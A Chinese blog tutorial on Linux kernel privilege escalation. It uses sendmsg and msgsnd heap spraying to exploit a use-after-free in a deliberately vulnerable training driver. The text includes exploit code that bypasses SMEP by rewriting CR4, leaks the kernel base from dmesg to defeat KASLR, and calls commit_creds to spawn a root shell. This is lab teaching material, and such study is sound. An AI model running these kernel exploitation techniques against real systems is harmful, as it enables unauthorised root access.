linux内核提权系列教程(1):堆喷射函数sendmsg与msgsend利用

最新推荐文章于 2023-12-07 07:00:00 发布
最新推荐文章于 2023-12-07 07:00:00 发布
阅读量1k 收藏 1
点赞数
分类专栏: 内核漏洞 漏洞 文章标签: 内核漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/panhewu9919/article/details/100637619
版权

说明:实验所需的驱动源码、bzImage、cpio文件见我的github进行下载。本教程适合对漏洞提权有一定了解的同学阅读,具体可以看看我先知之前的文章,或者我的简书

一、 堆喷函数介绍

在linux内核下进行堆喷射时,首先需要注意喷射的堆块的大小,因为只有大小相近的堆块才保存在相同的cache中。具体的cache块分布如下图:

在这里插入图片描述

本文的漏洞例子中uaf_obj对象的大小是84,实际申请时会分配一个96字节的堆块。本例中我们可以申请96大小的k_object对象,并在堆块上任意布置数据,但这样的话就太简单了点,实际漏洞利用中怎么会这么巧就让你控制堆上的数据呢。所以我们需要找到某些用户可调用的函数,它会在内核空间申请指定大小的chunk(本例中我们希望能分配到96字节的块),并把用户的数据拷贝过去。

(1)sendmsg

static int ___sys_sendmsg(struct socket *sock, struct user_msghdr __user *msg,
			 struct msghdr *msg_sys, unsigned int flags,
			 struct used_address *used_address,
			 unsigned int allowed_msghdr_flags)
{
	struct compat_msghdr __user *msg_compat =
	    (struct compat_msghdr __user *)msg;
	struct sockaddr_storage address;
	struct iovec iovstack[UIO_FASTIOV], *iov = iovstack;
	unsigned char ctl[sizeof(struct cmsghdr) + 20]
				__aligned(sizeof(__kernel_size_t)); // 创建44字节的栈缓冲区ctl,20是ipv6_pktinfo结构的大小
	unsigned char *ctl_buf = ctl; // ctl_buf指向栈缓冲区ctl
	int ctl_len;
	ssize_t err;

	msg_sys->msg_name = &address;

	if (MSG_CMSG_COMPAT & flags)
		err = get_compat_msghdr(msg_sys, msg_compat, NULL, &iov);
	else
		err = copy_msghdr_from_user(msg_sys, msg, NULL, &iov); // 用户数据拷贝到msg_sys,只拷贝msghdr消息头部
	if (err < 0)
		return err;

	err = -ENOBUFS;

	if (msg_sys->msg_controllen > INT_MAX) //如果msg_sys小于INT_MAX,就把ctl_len赋值为用户提供的msg_controllen
		goto out_freeiov;
	flags |= (msg_sys->msg_flags & allowed_msghdr_flags);
	ctl_len = msg_sys->msg_controllen;
	if ((MSG_CMSG_COMPAT & flags) && ctl_len) {
		err =
		    cmsghdr_from_user_compat_to_kern(msg_sys, sock->sk, ctl,
						     sizeof(ctl));
		if (err)
			goto out_freeiov;
		ctl_buf = msg_sys->msg_control;
		ctl_len = msg_sys->msg_controllen;
	} else if (ctl_len) {
		BUILD_BUG_ON(sizeof(struct cmsghdr) !=
			     CMSG_ALIGN(sizeof(struct cmsghdr)));
		if (ctl_len > sizeof(ctl)) {  //注意用户数据的size必须大于44字节
			ctl_buf = sock_kmalloc(sock->sk, ctl_len, GFP_KERNEL);//sock_kmalloc最后会调用kmalloc 分配 ctl_len 大小的堆块
			if (ctl_buf == NULL)
				goto out_freeiov;
		}
		err = -EFAULT;
		/* 注意,msg_sys->msg_control是用户可控的用户缓冲区;ctl_len是用户可控的长度。  用户数据拷贝到ctl_buf内核空间。
		 */
		if (copy_from_user(ctl_buf,
				   (void __user __force *)msg_sys->msg_control,
				   ctl_len))
			goto out_freectl;
		msg_sys->msg_control = ctl_buf;
	}
	msg_sys->msg_flags = flags;
...

结论:只要传入size大于44,就能控制kmalloc申请的内核空间的数据。

数据流

msg —> msg_sys —> msg_sys->msg_controllen —> ctl_len

msg —> msg_sys->msg_control —> ctl_buf

利用流程

//限制: BUFF_SIZE > 44
char buff[BUFF_SIZE];
struct msghdr msg = {0};
struct sockaddr_in addr = {0};
int sockfd = socket(AF_INET, SOCK_DGRAM, 0);
addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
addr.sin_family = AF_INET;
addr.sin_port = htons(6666);
// 布置用户空间buff的内容
msg.msg_control = buff;
msg.msg_controllen = BUFF_SIZE; 
msg.msg_name = (caddr_t)&addr;
msg.msg_namelen = sizeof(addr);
// 假设此时已经产生释放对象,但指针未清空
for(int i = 0; i < 100000; i++) {
  sendmsg(sockfd, &msg, 0);
}
// 触发UAF即可

(2)msgsnd

// /ipc/msg.c
SYSCALL_DEFINE4(msgsnd, int, msqid, struct msgbuf __user *, msgp, size_t, msgsz,
		int, msgflg)
{
	return ksys_msgsnd(msqid, msgp, msgsz, msgflg);
}
// /ipc/msg.c
long ksys_msgsnd(int msqid, struct msgbuf __user *msgp, size_t msgsz,
		 int msgflg)
{
	long mtype;

	if (get_user(mtype, &msgp->mtype))
		return -EFAULT;
	return do_msgsnd(msqid, mtype, msgp->mtext, msgsz, msgflg);
}
// /ipc/msg.c
static long do_msgsnd(int msqid, long mtype, void __user *mtext,
		size_t msgsz, int msgflg)
{
	struct msg_queue *msq;
	struct msg_msg *msg;
	int err;
	struct ipc_namespace *ns;
	DEFINE_WAKE_Q(wake_q);

	ns = current->nsproxy->ipc_ns;

	if (msgsz > ns->msg_ctlmax || (long) msgsz < 0 || msqid < 0)
		return -EINVAL;
	if (mtype < 1)
		return -EINVAL;
  msg = load_msg(mtext, msgsz);  // 调用load_msg
...
// /ipc/msgutil.c
struct msg_msg *load_msg(const void __user *src, size_t len)
{
	struct msg_msg *msg;
	struct msg_msgseg *seg;
	int err = -EFAULT;
	size_t alen;

	msg = alloc_msg(len);  // alloc_msg
	if (msg == NULL)
		return ERR_PTR(-ENOMEM);

	alen = min(len, DATALEN_MSG); // DATALEN_MSG
	if (copy_from_user(msg + 1, src, alen)) // copy1
		goto out_err;

	for (seg = msg->next; seg != NULL; seg = seg->next) {
		len -= alen;
		src = (char __user *)src + alen;
		alen = min(len, DATALEN_SEG);
		if (copy_from_user(seg + 1, src, alen)) // copy2
			goto out_err;
	}

	err = security_msg_msg_alloc(msg);
	if (err)
		goto out_err;

	return msg;

out_err:
	free_msg(msg);
	return ERR_PTR(err);
}
// /ipc/msgutil.c
#define DATALEN_MSG	((size_t)PAGE_SIZE-sizeof(struct msg_msg))
static struct msg_msg *alloc_msg(size_t len)
{
	struct msg_msg *msg;
	struct msg_msgseg **pseg;
	size_t alen;

	alen = min(len, DATALEN_MSG);
	msg = kmalloc(sizeof(*msg) + alen, GFP_KERNEL_ACCOUNT); // 先分配了一个msg_msg结构大小
...

msgsnd()—>ksys_msgsnd()—>do_msgsnd()

do_msgsnd()根据用户传递的buffer和size参数调用load_msg(mtext, msgsz),load_msg()先调用alloc_msg(msgsz)创建一个msg_msg结构体(),然后拷贝用户空间的buffer紧跟msg_msg结构体的后面,相当于给buffer添加了一个头部,因为msg_msg结构体大小等于0x30,因此用户态的buffer大小等于xx-0x30

结论:前0x30字节不可控。数据量越大(本文示例是96字节),发生阻塞可能性越大,120次发送足矣。

利用流程

// 只能控制0x30字节以后的内容
struct {
  long mtype;
  char mtext[BUFF_SIZE];
}msg;
memset(msg.mtext, 0x42, BUFF_SIZE-1); // 布置用户空间的内容
msg.mtext[BUFF_SIZE] = 0;
int msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT);
msg.mtype = 1; //必须 > 0
// 假设此时已经产生释放对象,但指针未清空
for(int i = 0; i < 120; i++)
  msgsnd(msqid, &msg, sizeof(msg.mtext), 0);
// 触发UAF即可

二、 漏洞分析

(1)代码分析

我们以漏洞驱动-vuln_driver来进行实践。vuln_driver驱动包含漏洞有任意地址读写、空指针引用、未初始化栈变量、UAF漏洞、缓冲区溢出。本文主要分析UAF漏洞及其利用。

// vuln_driver.c: do_ioctl()驱动号分配函数
static long do_ioctl(struct file *filp, unsigned int cmd, unsigned long args)
{
	int ret;
	unsigned long *p_arg = (unsigned long *)args;
 	ret = 0;

	switch(cmd) {
		case DRIVER_TEST:
			printk(KERN_WARNING "[x] Talking to device [x]\n");
			break;
		case ALLOC_UAF_OBJ:
			alloc_uaf_obj(args);
			break;
		case USE_UAF_OBJ:
			use_uaf_obj();
			break;
		case ALLOC_K_OBJ:
			alloc_k_obj((k_object *) args);
			break;
		case FREE_UAF_OBJ:
			free_uaf_obj();
			break;
	}
	return ret;
}

//uaf对象的结构,包含一个函数指针fn,size=84
	typedef struct uaf_obj
	{
		char uaf_first_buff[56];
		long arg;
		void (*fn)(long);
		char uaf_second_buff[12];
	}uaf_obj;

//k_object对象用于测试
typedef struct k_object
	{
		char kobj_buff[96];
	}k_object;

主要代码如下,漏洞就是在释放堆时,未将存放堆地址的全局变量清零。

// 1. uaf_callback() 一个简单的回调函数
  uaf_obj *global_uaf_obj = NULL;
  static void uaf_callback(long num)
	{
		printk(KERN_WARNING "[-] Hit callback [-]\n");
	}	

// 2. 分配一个uaf对象,fn指向回调函数uaf_callback,第一个缓冲区uaf_first_buff填充"A"。 global_uaf_obj全局变量指向该对象
	static int alloc_uaf_obj(long __user arg)
	{
		struct uaf_obj *target;
		target = kmalloc(sizeof(uaf_obj), GFP_KERNEL);

		if(!target) {
			printk(KERN_WARNING "[-] Error no memory [-]\n");
			return -ENOMEM;
		}
		target->arg = arg;
		target->fn = uaf_callback;
		memset(target->uaf_first_buff, 0x41, sizeof(target->uaf_first_buff));

		global_uaf_obj = target;
		printk(KERN_WARNING "[x] Allocated uaf object [x]\n");
		return 0;
	}

// 3. 释放uaf对象,但未清空global_uaf_obj指针
	static void free_uaf_obj(void)
	{
		kfree(global_uaf_obj);
		//global_uaf_obj = NULL 
		printk(KERN_WARNING "[x] uaf object freed [x]");
	}

// 4. 使用uaf对象,调用成员fn指向的函数
	static void use_uaf_obj(void)
	{
		if(global_uaf_obj->fn)
		{
			//debug info
			printk(KERN_WARNING "[x] Calling 0x%p(%lu)[x]\n", global_uaf_obj->fn, global_uaf_obj->arg);

			global_uaf_obj->fn(global_uaf_obj->arg);
		}
	}

// 5. 分配k_object对象,并从用户地址user_kobj拷贝数据到分配的地址
	static int alloc_k_obj(k_object *user_kobj)
	{
		k_object *trash_object = kmalloc(sizeof(k_object), GFP_KERNEL);
		int ret;

		if(!trash_object) {
			printk(KERN_WARNING "[x] Error allocating k_object memory [-]\n");
			return -ENOMEM;
		}

		ret = copy_from_user(trash_object, user_kobj, sizeof(k_object));
		printk(KERN_WARNING "[x] Allocated k_object [x]\n");
		return 0;
	}

(2)利用思路

思路:如果uaf_obj被释放,但指向它的global_uaf_obj变量未清零,若另一个对象分配到相同的cache,并且能够控制该cache上的内容,我们就能控制fn()调用的函数。

测试:本例中我们可以利用k_object对象来布置堆数据,将uaf_obj对象的fn指针覆盖为0x4242424242424242。

//完整代码见easy_uaf.c
void use_after_free_kobj(int fd)
{
     k_object *obj = malloc(sizeof(k_object));
    
    //60 bytes overwrites the last 4 bytes of the address
    memset(obj->buff, 0x42, 60); 

    ioctl(fd, ALLOC_UAF_OBJ, NULL);
    ioctl(fd, FREE_UAF_OBJ, NULL);

    ioctl(fd, ALLOC_K_OBJ, obj);
    ioctl(fd, USE_UAF_OBJ, NULL);
}

报错结果如下:
在这里插入图片描述

三、 漏洞利用

(1)绕过SMEP

1. 绕过SMEP防护方法

CR4寄存器的第20位为1,则表示开启了SMEP,若执行到用户指令,就会报错"BUG: unable to handle kernel paging request at 0xxxxxx"。绕过SMEP的方法见我的笔记https://www.jianshu.com/p/6f1d2f3f5126。不过最简单的方法是通过native_write_cr4()函数:

// /arch/x86/include/asm/special_insns.h
static inline void native_write_cr4(unsigned long val)
{
	asm volatile("mov %0,%%cr4": : "r" (val), "m" (__force_order));
}

本文用到的vuln_driver简化了利用过程,否则我们还需要控制第1个参数,所以利用目标就是:global_uaf_obj->fn(global_uaf_obj->arg) —> native_write_cr4(global...->arg)。 也即执行native_write_cr4(0x407f0)即可。

2. 堆喷函数

sendmsg注意:分配堆块必须大于44。

//用sendmsg构造堆喷,一个通用接口搞定,只需传入待执行的目标地址+参数
void use_after_free_sendmsg(int fd, size_t target, size_t arg)
{
	char buff[BUFF_SIZE];
	struct msghdr msg={0};
	struct sockaddr_in addr={0};
	int sockfd = socket(AF_INET,SOCK_DGRAM,0);
    // 布置堆喷数据
	memset(buff,0x43,sizeof buff);
	memcpy(buff+56,&arg,sizeof(long));
	memcpy(buff+56+(sizeof(long)),&target,sizeof(long));

	addr.sin_addr.s_addr=htonl(INADDR_LOOPBACK);
	addr.sin_family=AF_INET;
	addr.sin_port=htons(6666);

	// buff是堆喷射的数据,BUFF_SIZE是最后要调用KMALLOC申请的大小
	msg.msg_control=buff;
	msg.msg_controllen=BUFF_SIZE;
	msg.msg_name=(caddr_t)&addr;
	msg.msg_namelen= sizeof(addr);
	// 构造UAF对象
	ioctl(fd,ALLOC_UAF_OBJ,NULL);
	ioctl(fd,FREE_UAF_OBJ,NULL);
	//开始堆喷
	for (int i=0;i<10000;i++){
		sendmsg(sockfd,&msg,0);
	}
	//触发
	ioctl(fd,USE_UAF_OBJ,NULL);
}

//用msgsnd构造堆喷
int use_after_free_msgsnd(int fd, size_t target, size_t arg)
{
	int new_len=BUFF_SIZE-48;
	struct {
		size_t mtype;
		char mtext[new_len];
	} msg;
	//布置堆喷数据,必须减去头部48字节
	memset(msg.mtext,0x42,new_len-1);
	memcpy(msg.mtext+56-48,&arg,sizeof(long));
	memcpy(msg.mtext+56-48+(sizeof(long)),&target,sizeof(long));
	msg.mtext[new_len]=0;
	msg.mtype=1; //mtype必须 大于0

	// 创建消息队列
	int msqid=msgget(IPC_PRIVATE,0644 | IPC_CREAT);
	// 构造UAF对象
	ioctl(fd, ALLOC_UAF_OBJ,NULL);
	ioctl(fd,FREE_UAF_OBJ,NULL);
	//开始堆喷
	for (int i=0;i<120;i++)
		msgsnd(msqid,&msg,sizeof(msg.mtext),0);
	//触发
	ioctl(fd,USE_UAF_OBJ,NULL);
}

msgsnd注意:msgsnd堆喷必须减去头部长度48,前48字节不可控。

3. 绕过SMEP测试

完整代码见test_smep.c

注意:暂时先关闭ASLR,单核启动,修改start.sh脚本即可。

int main()
{
	size_t native_write_cr4_addr=0xffffffff81065a30;
	size_t fake_cr4=0x407e0;

	void *addr=mmap((void *)MMAP_ADDR,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC, MAP_FIXED|MAP_SHARED|MAP_ANON,0,0);
	void **fn=MMAP_ADDR;
	// 拷贝stub代码到 MMAP_ADDR
	memcpy(fn,stub,128);
	int fd=open(PATH,O_RDWR);
	//用于标识dmesg中字符串的开始
	ioctl(fd,DRIVER_TEST,NULL);
	/*
	use_after_free_sendmsg(fd,native_write_cr4_addr,fake_cr4);
	use_after_free_sendmsg(fd,MMAP_ADDR,0);
	*/
	
	use_after_free_msgsnd(fd,native_write_cr4_addr,fake_cr4);
	use_after_free_msgsnd(fd,MMAP_ADDR,0);
	
	return 0;
}

修改cr4之前,执行用户代码会报错:
在这里插入图片描述

修改cr4之后,能够执行到用户代码:

在这里插入图片描述

(2)绕过KASLR

1. 方法

注意start.sh中开启ASLR。

目标:泄露kernel地址,获取native_write_cr4prepare_kernel_credcommit_creds函数地址。

说明:一般都会开启kptr_restrict保护,不能读取/proc/kallsyms,但是通常可以dmesg读取内核打印的信息。

方法:由dmesg可以想到,构造pagefault,利用内核打印信息来泄露kernel地址。

在这里插入图片描述

如上图所示,可以利用SyS_ioctl+0x79/0x90来泄露kernel地址,接下来只需寻找目标函数地址的相对偏移即可。

# [<ffffffff8122bc59>] SyS_ioctl+0x79/0x90
/ # cat /proc/kallsyms | grep native_write_cr4
ffffffff81065a30 t native_write_cr4
/ # cat /proc/kallsyms | grep prepare_kernel_cred
ffffffff810a6ca0 T prepare_kernel_cred
/ # cat /proc/kallsyms | grep commit_creds
ffffffff810a68b0 T commit_creds
2. 步骤
  • 在子线程中触发page_fault,从dmesg读取打印信息
  • 找到SyS_ioctl+0x79地址,计算kernel_base
  • 计算3个目标函数地址

(3)整合exp

1. 单核运行
//让程序只在单核上运行,以免只关闭了1个核的smep,却在另1个核上跑shell
void force_single_core()
{
	cpu_set_t mask;
	CPU_ZERO(&mask);
	CPU_SET(0,&mask);

	if (sched_setaffinity(0,sizeof(mask),&mask))
		printf("[-----] Error setting affinity to core0, continue anyway, exploit may fault \n");
	return;
}
2. 泄露kernel基址
// 构造 page_fault 泄露kernel地址。从dmesg读取后写到/tmp/infoleak,再读出来
	pid_t pid=fork();
	if (pid==0){
		do_page_fault();
		exit(0);
	}
	int status;
	wait(&status);    // 等子进程结束
	//sleep(10);
	printf("[+] Begin to leak address by dmesg![+]\n");
	size_t kernel_base = get_info_leak()-sys_ioctl_offset;
	printf("[+] Kernel base addr : %p [+] \n", kernel_base);

	native_write_cr4_addr+=kernel_base;
	prepare_kernel_cred_addr+=kernel_base;
	commit_creds_addr+=kernel_base;
3. 关闭smep,并提权
  //关闭smep,并提权
	use_after_free_sendmsg(fd,native_write_cr4_addr,fake_cr4);
	use_after_free_sendmsg(fd,get_root,0);   //MMAP_ADDR
	//use_after_free_msgsnd(fd,native_write_cr4_addr,fake_cr4);
	//use_after_free_msgsnd(fd,get_root,0);  //MMAP_ADDR

	if (getuid()==0)
	{
		printf("[+] Congratulations! You get root shell !!! [+]\n");
		system("/bin/sh");
	}

(4)问题

原文的exploit有问题,是将get_root()代码用mmap映射到0x100000000000,然后跳转过去执行,但是直接把代码拷贝过去会有地址引用错误。

#执行0x100000000000处的内容时产生pagefault,可能是访问0x1000002ce8fd地址出错
 gdb-peda$ x /10i $pc
=> 0x100000000000:	push   rbp
   0x100000000001:	mov    rbp,rsp
   0x100000000004:	push   rbx
   0x100000000005:	sub    rsp,0x8
   0x100000000009:	
    mov    rbx,QWORD PTR [rip+0x2ce8ed]        # 0x1000002ce8fd
   0x100000000010:	
    mov    rax,QWORD PTR [rip+0x2ce8ee]        # 0x1000002ce905
   0x100000000017:	mov    edi,0x0
   0x10000000001c:	call   rax
   0x10000000001e:	mov    rdi,rax
   0x100000000021:	call   rbx
#报错信息如下:
[   10.421887] BUG: unable to handle kernel paging request at 00001000002ce8fd
[   10.424836] IP: [<0000100000000009>] 0x100000000009

解决:不需要将get_root()代码拷贝到0x100000000000,直接执行get_root()即可。

最后成功提权:

在这里插入图片描述

exp代码见exp_heap_spray.c

参考:

https://invictus-security.blog/2017/06/15/linux-kernel-heap-spraying-uaf/

http://edvison.cn/2018/07/25/%E5%A0%86%E5%96%B7%E5%B0%84/

https://github.com/invictus-0x90/vulnerable_linux_driver

https://turingsec.github.io/CVE-2016-0728/

bsauce
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux 4.4.0内核源码分析TCP实现
05-17
1. 用户层 TCP:用户层 TCP 是指用户进程与内核之间的 TCP 协议实现。用户层 TCP 的主要任务是将用户进程的数据传输需求转换为内核可以理解的形式,并将内核的响应传递回用户进程。 2. 内核层 TCP:内核层 TCP 是指...
sendmsg 和 recvmsg 函数
Tattoo的博客
08-22 1万+
1. 基础介绍   最通用的I/O函数,只要设置好参数,read、readv、recv、recvfrom和write、writev、sendsendto等函数都可以对应换成这两个函数来调用。同时,各种输出函数调用也可以替换成sendmsg调用。 #include &amp;lt;sys/socket.h&amp;gt; ssize_t recvmsg(int sockfd, struct msghdr *m...
mysql udp提权_linux内核提权系列教程(1):喷射函数sendmsgmsgsend利用
weixin_39875516的博客
02-07 304
本文从我的先知转过来。说明:实验所需的驱动源码、bzImage、cpio文件见我的github进行下载。本教程适合对漏洞提权有一定了解的同学阅读,具体可以看看我先知之前的文章,或者我的简书。一、 函数介绍在linux内核下进行喷射时,首先需要注意喷射块的大小,因为只有大小相近的块才保存在相同的cache中。具体的cache块分布如下图:cache_distrubute.png本文的漏洞...
溢出,喷射简介
kernweak的博客
11-21 4012
简介 上分配内存,就是比如malloc,就是从上把这块内存的链表,摘下来共我们使用。上自己是按桶的结构进行管理(一个hash表),从2^1,2^2,2^3,2^4.....,如果申请一个50字节内存,就从,2^6分配,64-50=14,有14个内存碎片。我们申请内存就是从这个内存表中把某一个节点从这个双向链表中摘掉。即 Node->bp->fp=Node->fp; ...
Linux socket编程(12):Unix套接字之socketpair、sendmsg和recvmsg详解
最新发布
主要分享硬件、嵌入式软件部分知识
12-07 1743
在上一篇文章中,我们对Unix套接字编程有一个基本的了解。socketpairsendmsg和recvmsg,它们为实现本地进程间通信提供了便捷的方式。
喷射中的问题
sxr__nc的博客
04-01 825
在CSDN上边讲解喷射的文章有很多,这里也就不再赘述,记录一下自己在看的过程中遇到的一些问题: 1:进程中的: 进程在创建之初会初始或一个进程默认的,在实际的使用过程中我们可以使用GetProcessHeap(void)这个函数来获得系统默认的句柄,并对其进行操作 HANDLE GetProcessHeap(void); 与之相对应的就是用户在程序中自己申请的空间,我们称之为私有,可...
Linux中与内核通信Netlink机制.pdf
11-01
Netlink提供了一种消息传递的方式,使得用户态程序能够安全地与内核交互,传递数据和控制信息,而无需通过系统调用来完成所有的操作。在Linux 2.6及以后的内核版本中,Netlink经历了显著的变化和发展。 Netlink的...
Linux中与内核通信Netlink机制.docx
11-01
Linux操作系统中,Netlink是一种重要的通信机制,它允许用户空间的应用程序与内核空间进行安全、高效的数据交换。Netlink最初设计是用来处理系统审计事件,但随着时间的发展,它的用途已经扩展到了各种需要内核与...
linux内核态与用户态通信-netlink实例解析
07-24
3. 消息发送:sendmsg()或sendto()函数用于向内核发送Netlink消息,消息包含头信息和数据,头信息中定义了消息类型、序列号、源和目标组等。 4. 消息接收:recvmsg()函数用于接收内核返回的消息。内核会根据消息的...
C语言的isatty函数和ttyname函数以及sendmsg函数用法
09-03
在C语言中,掌握一些基础的输入输出和通信功能至关重要,`isatty()`、`ttyname()`和`sendmsg()`函数就是这样的关键工具。本文将详细介绍这三个函数的用途、使用方法及其在C语言编程中的作用。 首先,我们来看`...
Linux编程之recvmsgsendmsg函数
B.souls
10-15 536
Linux编程之recvmsgsendmsg函数 recvmsgsendmsg 函数 #include <sys/types.h> #include <sys/socket.h> ssize_t send(int sockfd, const void *buf, size_t len, int flags); ssize_t sendto(int sockfd, const void *buf, size_t len, int flags,
二进制安全之——相关漏洞
PICACHU+++的博客
10-10 2422
主要是指用户动态申请的内存(如:调用malloc,alloc,alloca,new等函数)。glibc malloc源码中有三种最基本的块数据结构,分别是heap_info,malloc_state,malloc_chunk。
sendmsg系统调用
hhhhhyyyyy8的博客
06-05 3297
sendmsg系统调用,主要工作是将用户空间的消息头复制到内核空间中,对消息头进行检查。最后逐级调用发包接口发送数据。 SYSCALL_DEFINE3(sendmsg, int, fd, struct user_msghdr __user *, msg, unsigned int, flags) E:\linux-4.1.45\linux-4.1.45\net\socket.c SYSCALL_DEFINE3(sendmsg, int, fd, struct user_msghdr __user *.
linux通用内核,Linux内核通用喷射技术详解
weixin_28982257的博客
04-29 434
简介这个内核喷射技术曾经在beVX研讨会期间进行过相应的演示,之后,还曾被用于内核IrDA子系统(Ubuntu 16.04)的0day攻击。与已知的喷射不同,该技术适用于非常小的对象(大小不超过8或16字节)或需要控制前N个字节的对象(即目标对象中没有不受控制的头部)。这种技术可以用来利用两个UAF内核漏洞,正如我在研讨会上提到的那样,“喷射”这个术语在利用UAF漏洞时并不适用,因为它通常不...
喷射学习笔记~
weixin_30693183的博客
07-18 2016
分析网页上数据的存储: IE6 IE7 而言, 快速(在块大小与重复喷射次数之间找到平衡点), 稳定(每次喷射都能使目标地址指向NOPS) JS 上分配字符串 会变成 BSTR字符串对象,该对象有一个 头信息 + 终止符, 并包含原始字符串经UNICODE转换后的字符串 ...
Linux高级进程编程———在任意两个进程间传递文件描述符:使用 sendmsg 和 recvmsg 实现
m0_51551385的博客
05-08 2801
/* 本程序实现子进程打开一个文件描述符,然后将其传递给父进程,父进程通过其获得文件内容 */ #include<sys/socket.h> #include<fcntl.h> #include<stdio.h> #include<unistd.h> #include<stdlib.h> #include<assert.h> #include<string.h> static const int CONTROL_LEN =
linux网络编程之用socket实现简单客户端和服务端的通信(基于UDP)
热门推荐
码莎拉蒂
02-23 1万+
1、sendto和recvfrom函数介绍 sendto(经socket传送数据) 相关函数 send , sendmsg,recv , recvfrom , socket 表头文件 #include #include 定义函数 int sendto ( int s , const void * msg, int l
基于 arm64 Linux nanosleep 系统调用流程分析
洪伟的专栏
08-02 1482
nanosleep (高分辨率睡眠)可实现纳秒级的睡眠,暂停调用线程的执行。在 Linux 内核中是如何实现的?下面基于 arm64 cpu 架构去分析。
Heap Spray原理
m0_46161993的博客
03-13 1926
什么是Heap Spray?   喷射是在 shellcode 的前面加上大量的slide code(滑板指令),组成一个注入代码段。然后向系统申请大量内存,并且反复用注入代码段来填充。这样就使得内存被大量的注入代码占据。然后通过结合其他漏洞控制程序流,使得程序执行到上,最终将导致shellcode的执行。   常见的slide code有NOP指令,还有一些类NOP指令,比如0x0c,0x0...
Linux用户空间与内核通信:Netlink与字符设备解析
"本文档主要讨论了Linux用户空间与内核空间之间通过Netlink和字符设备进行通信的方法,特别关注于最新内核4.0版本。这两种方法都是实现用户态程序与内核模块交互的关键技术。" 在Linux环境中,用户空间与内核空间的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值